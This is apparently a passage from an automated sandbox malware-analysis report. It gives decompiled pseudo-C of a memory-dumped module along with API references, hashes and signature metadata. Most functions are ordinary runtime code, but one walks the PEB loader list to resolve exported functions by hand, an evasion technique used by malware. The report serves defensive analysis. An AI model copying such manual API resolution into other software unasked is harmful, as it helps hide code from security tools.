							}
							E7321B8D0(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x7321bf51
0x7321bf58
0x7321bf5d
0x7321bf63
0x7321bf66
0x7321bf6c
0x7321bf71
0x7321bf76
0x7321bf76
0x7321bf7c
0x7321bf81
0x7321bf86
0x7321bf86
0x7321bf8d
0x7321bf92
0x7321bf97
0x7321bf97
0x7321bf9e
0x7321bfa3
0x7321bfa8
0x7321bfa8
0x7321bfaf
0x7321bfb4
0x7321bfb9
0x7321bfb9
0x7321bfc1
0x7321bfd1
0x7321bfe3
0x7321bff5
0x7321c008
0x7321c01a
0x7321c022
0x7321c027
0x7321c02c
0x7321c02c
0x7321c033
0x7321c038
0x7321c038
0x7321c03f
0x7321c044
0x7321c044
0x7321c04b
0x7321c050
0x7321c050
0x7321c057
0x7321c05c
0x7321c05c
0x7321c066
0x7321c068
0x7321c0a2
0x7321c06a
0x7321c06f
0x7321c093
0x7321c09b
0x7321c08f
0x7321c08f
0x7321c0a5
0x7321c0ac
0x7321c0ae
0x7321c0d0
0x7321c0d8
0x7321c0db
0x7321c0db
0x7321c0dd
0x7321c0dd
0x7321c0e8
0x7321c0ee
0x7321c0f3
0x7321c0fa
0x7321c134
0x7321c13f
0x7321c145
0x7321c148
0x7321c14b
0x7321c157
0x7321c15f
0x7321c0fc
0x7321c0ff
0x7321c10b
0x7321c111
0x7321c117
0x7321c11a
0x7321c123
0x7321c123
0x7321c162
0x7321c170
0x7321c176
0x7321c179
0x7321c17e
0x7321c180
0x7321c183
0x7321c183
0x7321c188
0x7321c18a
0x7321c18d
0x7321c18d
0x7321c192
0x7321c194
0x7321c197
0x7321c197
0x7321c19c
0x7321c19e
0x7321c1a1
0x7321c1a1
0x7321c1a6
0x7321c1a8
0x7321c1a8
0x7321c1b5
0x7321c1b8
0x7321c1ef
0x7321c1ba
0x7321c1ba
0x7321c1bd
0x7321c1e8
0x7321c1dd
0x7321c1dd
0x7321c1f1
0x7321c1f9
0x7321c1fc
0x7321c21b
0x7321c220
0x7321c220
0x7321c222
0x7321c227
0x7321c233
0x7321c229
0x7321c22c
0x7321c22c
0x7321c238
0x7321c238
0x7321c1fe
0x7321c201
0x7321c210
0x00000000
0x7321c210
0x7321c203
0x7321c206
0x7321c208
0x7321c208
0x00000000
0x7321c206
0x7321c1bf
0x7321c1c2
0x7321c1d8
0x00000000
0x7321c1d8
0x7321c1c7
0x7321c1c9
0x7321c1c9
0x7321c1c7
0x00000000
0x7321c1b8
0x7321c0b5
0x7321c0c3
0x7321c0cb
0x00000000
0x7321c0cb
0x7321c0b9
0x7321c0be
0x7321c0be
0x00000000
0x7321c0b9
0x7321c076
0x7321c084
0x7321c08c
0x00000000
0x7321c08c
0x7321c07a
0x7321c07f
0x7321c07f
0x7321c07a

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,7321BF3E,?,?,00000008,?,?,7321BBD2,00000000), ref: 7321C170

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: c37ff9e269deff50a8110f8de85d2b20b528cfb6c35eca7b8e4dc136bda42929
Instruction ID: 2dbb7fe56f435327277f13f33d1bd00a66202c28d9cf1883b91b9d96331e9d81
Opcode Fuzzy Hash: c37ff9e269deff50a8110f8de85d2b20b528cfb6c35eca7b8e4dc136bda42929
Instruction Fuzzy Hash: 97B1173522061A9FD705CF28C586B557BF1FF45364F298658E8DACF2A1C336E9A2CB40

Uniqueness

Uniqueness Score: -1.00%

Function 73213247, Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E73213247(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x73231bdc =  *0x73231bdc & 0x00000000;
				 *0x73231010 =  *0x73231010 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v12 = _v28 ^ 0x49656e69;
				_v8 = _v36 ^ 0x756e6547;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v32 ^ 0x6c65746e | _v12) != 0) {
					L9:
					_t96 =  *0x73231be0; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x73231be0 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x73231010; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x73231bdc = 1;
					 *0x73231010 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x73231bdc = 2;
						 *0x73231010 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x73231010; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x73231bdc = 3;
								 *0x73231010 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x73231bdc = 5;
									 *0x73231010 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x73231010 =  *0x73231010 | 0x00000040;
										 *0x73231bdc = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x73231be0; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x73231be0 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x73213247
0x7321324a
0x73213254
0x73213265
0x73213414
0x73213417
0x73213417
0x7321326b
0x73213271
0x73213276
0x7321327a
0x7321327e
0x7321327f
0x73213281
0x73213284
0x73213289
0x73213292
0x732132a3
0x732132ae
0x732132b4
0x732132b5
0x732132ba
0x732132bd
0x732132c2
0x732132ca
0x732132cd
0x732132d0
0x73213315
0x73213315
0x7321331b
0x7321331b
0x73213320
0x73213321
0x73213327
0x73213358
0x73213329
0x7321332b
0x7321332c
0x73213331
0x73213334
0x73213336
0x73213339
0x7321333c
0x7321333f
0x73213342
0x7321334b
0x73213350
0x73213350
0x7321334b
0x7321335b
0x73213360
0x73213363
0x7321336d
0x73213378
0x7321337e
0x73213381
0x7321338b
0x73213396
0x732133a2
0x732133a5
0x732133a8
0x732133b3
0x732133b8
0x732133ba
0x732133bf
0x732133c2
0x732133cc
0x732133d4
0x732133d9
0x732133e3
0x732133f1
0x73213404
0x7321340b
0x7321340b
0x732133f1
0x732133d4
0x732133b8
0x73213396
0x00000000
0x73213413
0x732132d5
0x732132df
0x73213304
0x7321330a
0x7321330d
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 7321325D

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 3b32b3905115efbc529a11cfedffa62446febf3261a13f17549eeffaf273a9ff
Instruction ID: 7dd39d3b6deb799b0aa98cb35b9f8cd8b459f94823acc50d8dcd65483d8b7fc5
Opcode Fuzzy Hash: 3b32b3905115efbc529a11cfedffa62446febf3261a13f17549eeffaf273a9ff
Instruction Fuzzy Hash: BE519072A04616CFDB15DF56C685799BBF6FB04340F28842AC90AEB280D375E950DF90

Uniqueness

Uniqueness Score: -1.00%

Function 73215FE6, Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E73215FE6(void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				union _FINDEX_INFO_LEVELS _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v48;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				intOrPtr* _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				signed int _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				signed int _v644;
				union _FINDEX_INFO_LEVELS _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				signed int _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				void* __ebx;
				void* __edi;
				intOrPtr _t68;
				signed int _t73;
				signed int _t75;
				char _t77;
				signed char _t78;
				signed int _t84;
				signed int _t94;
				signed int _t97;
				union _FINDEX_INFO_LEVELS _t98;
				union _FINDEX_INFO_LEVELS _t100;
				intOrPtr* _t106;
				signed int _t109;
				intOrPtr _t116;
				signed int _t118;
				signed int _t121;
				signed int _t123;
				void* _t126;
				union _FINDEX_INFO_LEVELS _t127;
				void* _t128;
				intOrPtr* _t130;
				intOrPtr* _t133;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t143;
				signed int _t149;
				void* _t155;
				signed int _t158;
				intOrPtr _t160;
				void* _t161;
				void* _t165;
				void* _t166;
				signed int _t167;
				signed int _t170;
				void* _t171;
				signed int _t172;
				void* _t173;
				void* _t174;

				_push(__ecx);
				_t133 = _a4;
				_t2 = _t133 + 1; // 0x1
				_t155 = _t2;
				do {
					_t68 =  *_t133;
					_t133 = _t133 + 1;
				} while (_t68 != 0);
				_t158 = _a12;
				_t135 = _t133 - _t155 + 1;
				_v8 = _t135;
				if(_t135 <=  !_t158) {
					_push(__esi);
					_t5 = _t158 + 1; // 0x1
					_t126 = _t5 + _t135;
					_t165 = E73215BA6(_t126, 1);
					__eflags = _t158;
					if(_t158 == 0) {
						L7:
						_push(_v8);
						_t126 = _t126 - _t158;
						_t73 = E73218B17(_t165 + _t158, _t126, _a4);
						_t172 = _t171 + 0x10;
						__eflags = _t73;
						if(_t73 != 0) {
							goto L12;
						} else {
							_t130 = _a16;
							_t118 = E732163E7(_t130);
							_v8 = _t118;
							__eflags = _t118;
							if(_t118 == 0) {
								 *( *(_t130 + 4)) = _t165;
								_t167 = 0;
								_t14 = _t130 + 4;
								 *_t14 =  *(_t130 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E73215C03(_t165);
								_t167 = _v8;
							}
							E73215C03(0);
							_t121 = _t167;
							goto L4;
						}
					} else {
						_push(_t158);
						_t123 = E73218B17(_t165, _t126, _a8);
						_t172 = _t171 + 0x10;
						__eflags = _t123;
						if(_t123 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E73215AE6();
							asm("int3");
							_t170 = _t172;
							_t173 = _t172 - 0x298;
							_t75 =  *0x73231004; // 0xa57badb2
							_v48 = _t75 ^ _t170;
							_t138 = _v32;
							_t156 = _v28;
							_push(_t126);
							_push(0);
							_t160 = _v36;
							_v648 = _t156;
							__eflags = _t138 - _t160;
							if(_t138 != _t160) {
								while(1) {
									_t116 =  *_t138;
									__eflags = _t116 - 0x2f;
									if(_t116 == 0x2f) {
										break;
									}
									__eflags = _t116 - 0x5c;
									if(_t116 != 0x5c) {
										__eflags = _t116 - 0x3a;
										if(_t116 != 0x3a) {
											_t138 = E73218B70(_t160, _t138);
											__eflags = _t138 - _t160;
											if(_t138 != _t160) {
												continue;
											}
										}
									}
									break;
								}
								_t156 = _v612;
							}
							_t77 =  *_t138;
							_v605 = _t77;
							__eflags = _t77 - 0x3a;
							if(_t77 != 0x3a) {
								L23:
								_t127 = 0;
								__eflags = _t77 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t78 = 1;
								} else {
									__eflags = _t77 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t77 - 0x3a;
										_t78 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v672 = _t127;
								_v668 = _t127;
								_push(_t165);
								asm("sbb eax, eax");
								_v664 = _t127;
								_v660 = _t127;
								_v640 =  ~(_t78 & 0x000000ff) & _t138 - _t160 + 0x00000001;
								_v656 = _t127;
								_v652 = _t127;
								_t84 = E73215DD6(_t138 - _t160 + 1, _t160,  &_v672, E732162F2(_t156, __eflags));
								_t174 = _t173 + 0xc;
								asm("sbb eax, eax");
								_t166 = FindFirstFileExW( !( ~_t84) & _v664, _t127,  &_v604, _t127, _t127, _t127);
								__eflags = _t166 - 0xffffffff;
								if(_t166 != 0xffffffff) {
									_t143 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
									__eflags = _t143;
									_t144 = _t143 >> 2;
									_v644 = _t143 >> 2;
									do {
										_v636 = _t127;
										_v632 = _t127;
										_v628 = _t127;
										_v624 = _t127;
										_v620 = _t127;
										_v616 = _t127;
										_t94 = E73215D07( &(_v604.cFileName),  &_v636,  &_v605, E732162F2(_t156, __eflags));
										_t174 = _t174 + 0x10;
										asm("sbb eax, eax");
										_t97 =  !( ~_t94) & _v628;
										__eflags =  *_t97 - 0x2e;
										if( *_t97 != 0x2e) {
											L34:
											_push(_v612);
											_t98 = E73215FE6(_t144, _t166, _t97, _t160, _v640);
											_t174 = _t174 + 0x10;
											_v648 = _t98;
											__eflags = _t98;
											if(_t98 != 0) {
												__eflags = _v616 - _t127;
												if(_v616 != _t127) {
													E73215C03(_v628);
													_t98 = _v648;
												}
												_t127 = _t98;
											} else {
												goto L35;
											}
										} else {
											_t144 =  *((intOrPtr*)(_t97 + 1));
											__eflags = _t144;
											if(_t144 == 0) {
												goto L35;
											} else {
												__eflags = _t144 - 0x2e;
												if(_t144 != 0x2e) {
													goto L34;
												} else {
													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t127;
													if( *((intOrPtr*)(_t97 + 2)) == _t127) {
														goto L35;
													} else {
														goto L34;
													}
												}
											}
										}
										L43:
										FindClose(_t166);
										goto L44;
										L35:
										__eflags = _v616 - _t127;
										if(_v616 != _t127) {
											E73215C03(_v628);
											_pop(_t144);
										}
										__eflags = FindNextFileW(_t166,  &_v604);
									} while (__eflags != 0);
									_t106 = _v612;
									_t149 = _v644;
									_t156 =  *_t106;
									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
									__eflags = _t149 - _t109;
									if(_t149 != _t109) {
										E73218620(_t156, _t156 + _t149 * 4, _t109 - _t149, 4, E73215C3D);
									}
									goto L43;
								} else {
									_push(_v612);
									_t127 = E73215FE6( &_v604, _t166, _t160, _t127, _t127);
								}
								L44:
								__eflags = _v652;
								_pop(_t165);
								if(_v652 != 0) {
									E73215C03(_v664);
								}
								_t100 = _t127;
							} else {
								__eflags = _t138 - _t160 + 1;
								if(_t138 == _t160 + 1) {
									_t77 = _v605;
									goto L23;
								} else {
									_push(_t156);
									_t100 = E73215FE6(_t138, _t165, _t160, 0, 0);
								}
							}
							_pop(_t161);
							__eflags = _v12 ^ _t170;
							_pop(_t128);
							return E73212813(_t100, _t128, _v12 ^ _t170, _t156, _t161, _t165);
						} else {
							goto L7;
						}
					}
				} else {
					_t121 = 0xc;
					L4:
					return _t121;
				}
			}

0x73215feb
0x73215fec
0x73215fef
0x73215fef
0x73215ff2
0x73215ff2
0x73215ff4
0x73215ff5
0x73215ffa
0x73216001
0x73216004
0x73216009
0x73216014
0x73216015
0x73216018
0x73216022
0x73216026
0x73216028
0x7321603c
0x7321603c
0x7321603f
0x73216049
0x7321604e
0x73216051
0x73216053
0x00000000
0x73216055
0x73216055
0x7321605a
0x73216061
0x73216064
0x73216066
0x73216077
0x73216079
0x7321607b
0x7321607b
0x7321607b
0x73216068
0x73216069
0x7321606e
0x73216071
0x73216080
0x73216086
0x00000000
0x73216089
0x7321602a
0x7321602a
0x73216030
0x73216035
0x73216038
0x7321603a
0x7321608c
0x7321608e
0x7321608f
0x73216090
0x73216091
0x73216092
0x73216093
0x73216098
0x7321609c
0x7321609e
0x732160a4
0x732160ab
0x732160ae
0x732160b1
0x732160b4
0x732160b5
0x732160b6
0x732160b9
0x732160bf
0x732160c1
0x732160c3
0x732160c3
0x732160c5
0x732160c7
0x00000000
0x00000000
0x732160c9
0x732160cb
0x732160cd
0x732160cf
0x732160da
0x732160dc
0x732160de
0x00000000
0x00000000
0x732160de
0x732160cf
0x00000000
0x732160cb
0x732160e0
0x732160e0
0x732160e6
0x732160e8
0x732160ee
0x732160f0
0x73216112
0x73216112
0x73216114
0x73216116
0x73216122
0x73216122
0x73216118
0x73216118
0x7321611a
0x00000000
0x7321611c
0x7321611c
0x7321611e
0x73216120
0x00000000
0x00000000
0x73216120
0x7321611a
0x7321612a
0x73216132
0x73216138
0x73216139
0x7321613b
0x73216143
0x73216149
0x7321614f
0x73216155
0x73216169
0x7321616e
0x73216179
0x7321618f
0x73216191
0x73216194
0x732161b7
0x732161b7
0x732161b9
0x732161bc
0x732161c2
0x732161c2
0x732161c8
0x732161ce
0x732161d4
0x732161da
0x732161e0
0x73216201
0x73216206
0x7321620b
0x7321620f
0x73216215
0x73216218
0x7321622b
0x7321622b
0x73216239
0x7321623e
0x73216241
0x73216247
0x73216249
0x732162a7
0x732162ad
0x732162b5
0x732162ba
0x732162c0
0x732162c1
0x00000000
0x00000000
0x00000000
0x7321621a
0x7321621a
0x7321621d
0x7321621f
0x00000000
0x73216221
0x73216221
0x73216224
0x00000000
0x73216226
0x73216226
0x73216229
0x00000000
0x00000000
0x00000000
0x00000000
0x73216229
0x73216224
0x7321621f
0x732162c3
0x732162c4
0x00000000
0x7321624b
0x7321624b
0x73216251
0x73216259
0x7321625e
0x7321625e
0x7321626d
0x7321626d
0x73216275
0x7321627b
0x73216281
0x73216288
0x7321628b
0x7321628d
0x7321629d
0x732162a2
0x00000000
0x73216196
0x73216196
0x732161a7
0x732161a7
0x732162ca
0x732162ca
0x732162d1
0x732162d2
0x732162da
0x732162df
0x732162e0
0x732160f2
0x732160f5
0x732160f7
0x7321610c
0x00000000
0x732160f9
0x732160f9
0x732160ff
0x73216104
0x732160f7
0x732162e5
0x732162e6
0x732162e8
0x732162f1
0x00000000
0x00000000
0x00000000
0x7321603a
0x7321600b
0x7321600d
0x7321600e
0x73216012
0x73216012

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59e5890ade2661c2ee3a7ef22110d2014bf00a343ca66c00f1a731c09fd2a237
Instruction ID: 36f9759cecfa0fac93fc08f95d2e133af58a215a9e79a85b93014962af2aea28
Opcode Fuzzy Hash: 59e5890ade2661c2ee3a7ef22110d2014bf00a343ca66c00f1a731c09fd2a237
Instruction Fuzzy Hash: 7C418FB180421AAFDB10DF69CD88BAEBBF9AF45300F2442D9E84DD3240DA359E948F14

Uniqueness

Uniqueness Score: -1.00%

Function 732176FC, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E732176FC() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x73232230 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x732176fc
0x73217704
0x7321770c

APIs

GetProcessHeap.KERNEL32 ref: 732176FC

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 350c7f55570dd0456867cc5db1a20ecbcb443390d82c0c8ad1452936288f5266
Instruction ID: a581bf1e233372118d83007683fd0719f2da856636cd236f461f5334c7e0bc1d
Opcode Fuzzy Hash: 350c7f55570dd0456867cc5db1a20ecbcb443390d82c0c8ad1452936288f5266
Instruction Fuzzy Hash: 4EA01132200208CB8300AE328B0C3083AA8BA003C0320C028A808C2000EB208000AA00

Uniqueness

Uniqueness Score: -1.00%

Function 73212440, Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75cb4285704739a957268dabf0def1296fa9bbba04dd1af3454ec59ddbaba9bd
Instruction ID: d70cb4cc87b72b2e32642be249a27d096b7207d80d91b48f8224bae4db6abd82
Opcode Fuzzy Hash: 75cb4285704739a957268dabf0def1296fa9bbba04dd1af3454ec59ddbaba9bd
Instruction Fuzzy Hash: 6DD16D75A0021BDFCB15CF58CA90B6AB7F6FF44314F2941A9E8069B385D374E9A1CB90

Uniqueness

Uniqueness Score: -1.00%

Function 73211FB0, Relevance: .1, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E73211FB0(signed short* __ecx, intOrPtr* __edx) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				unsigned int _v16;
				signed short* _v20;
				intOrPtr _v24;
				signed short* _v28;
				intOrPtr _t53;
				signed short* _t61;
				signed short* _t63;
				void* _t65;
				intOrPtr* _t71;
				signed short* _t72;
				unsigned int _t76;
				intOrPtr* _t78;
				signed int _t79;
				intOrPtr* _t85;
				signed short* _t88;
				intOrPtr* _t92;
				signed int _t96;
				intOrPtr* _t97;
				intOrPtr* _t103;
				intOrPtr* _t105;

				_v12 = __edx;
				_t88 = __ecx;
				_v28 = __ecx;
				_t78 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14));
				_v8 = _t78;
				if(_t78 == 0) {
					L19:
					__eflags = 0;
					return 0;
				} else {
					while(1) {
						_t72 = _t88;
						_v16 = ( *(_t78 + 0x24) & 0x0000ffff) >> 1;
						_t53 =  *((intOrPtr*)(_t78 + 0x28)) - _t88;
						_v20 = _t72;
						_v24 = _t53;
						while(1) {
							_t79 =  *(_t53 + _t72) & 0x000000ff;
							_t96 =  *_t72 & 0x000000ff;
							_t102 =  >  ? _t79 : _t79 + 0x00000020 & 0x0000ffff;
							_t81 =  >  ? _t96 : _t96 + 0x00000020 & 0x0000ffff;
							_t110 = ( >  ? _t79 : _t79 + 0x00000020 & 0x0000ffff) - ( >  ? _t96 : _t96 + 0x00000020 & 0x0000ffff);
							if(( >  ? _t79 : _t79 + 0x00000020 & 0x0000ffff) != ( >  ? _t96 : _t96 + 0x00000020 & 0x0000ffff)) {
								break;
							}
							_t72 =  &(_v20[1]);
							_t15 =  &_v16;
							 *_t15 = _v16 - 1;
							_v20 = _t72;
							if( *_t15 == 0) {
								_t103 = _v12;
								_t76 =  *(_v8 + 0x10);
								_v16 = _t76;
								_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x3c)) + _t76 + 0x78)) + _t76;
								_v28 = _t61;
								_t92 =  *((intOrPtr*)(_t61 + 0x20)) + _t76;
								_t63 =  *((intOrPtr*)(_t61 + 0x24)) + _t76;
								__eflags = _t63;
								_v20 = _t63;
								while(1) {
									_v8 = _t92;
									_t97 = E73212280(_t103);
									__eflags = _t103;
									if(_t103 == 0) {
										goto L18;
									}
									_t85 =  *_t92 + _t76;
									__eflags = _t85;
									if(_t85 == 0) {
										goto L18;
									}
									_t65 = 0;
									__eflags = _t97;
									if(_t97 != 0) {
										_t105 = _t103 - _t85;
										__eflags = _t105;
										while(1) {
											__eflags =  *((intOrPtr*)(_t105 + _t85)) -  *_t85;
											if(__eflags < 0 || __eflags > 0) {
												break;
											}
											_t65 = _t65 + 1;
											_t85 = _t85 + 1;
											__eflags = _t65 - _t97;
											if(_t65 < _t97) {
												continue;
											} else {
												_t76 = _v16;
											}
											goto L16;
										}
										_t103 = _v12;
										_t76 = _v16;
										_t92 = _v8;
										goto L18;
									}
									L16:
									_t71 =  *((intOrPtr*)(_v28[0xe] + ( *_v20 & 0x0000ffff) * 4 + _t76)) + _t76;
									__eflags = _t71;
									return _t71;
									goto L20;
									L18:
									_t92 = _t92 + 4;
									_v20 =  &(_v20[1]);
								}
							} else {
								_t53 = _v24;
								continue;
							}
							goto L20;
						}
						_t78 =  *_v8;
						_v8 = _t78;
						__eflags = _t78;
						if(_t78 == 0) {
							goto L19;
						} else {
							_t88 = _v28;
							continue;
						}
						goto L20;
					}
				}
				L20:
			}

0x73211fbd
0x73211fc0
0x73211fc7
0x73211fca
0x73211fcd
0x73211fd2
0x732120cf
0x732120d1
0x732120d7
0x00000000
0x73211fd8
0x73211fdc
0x73211fe0
0x73211fe6
0x73211fe8
0x73211feb
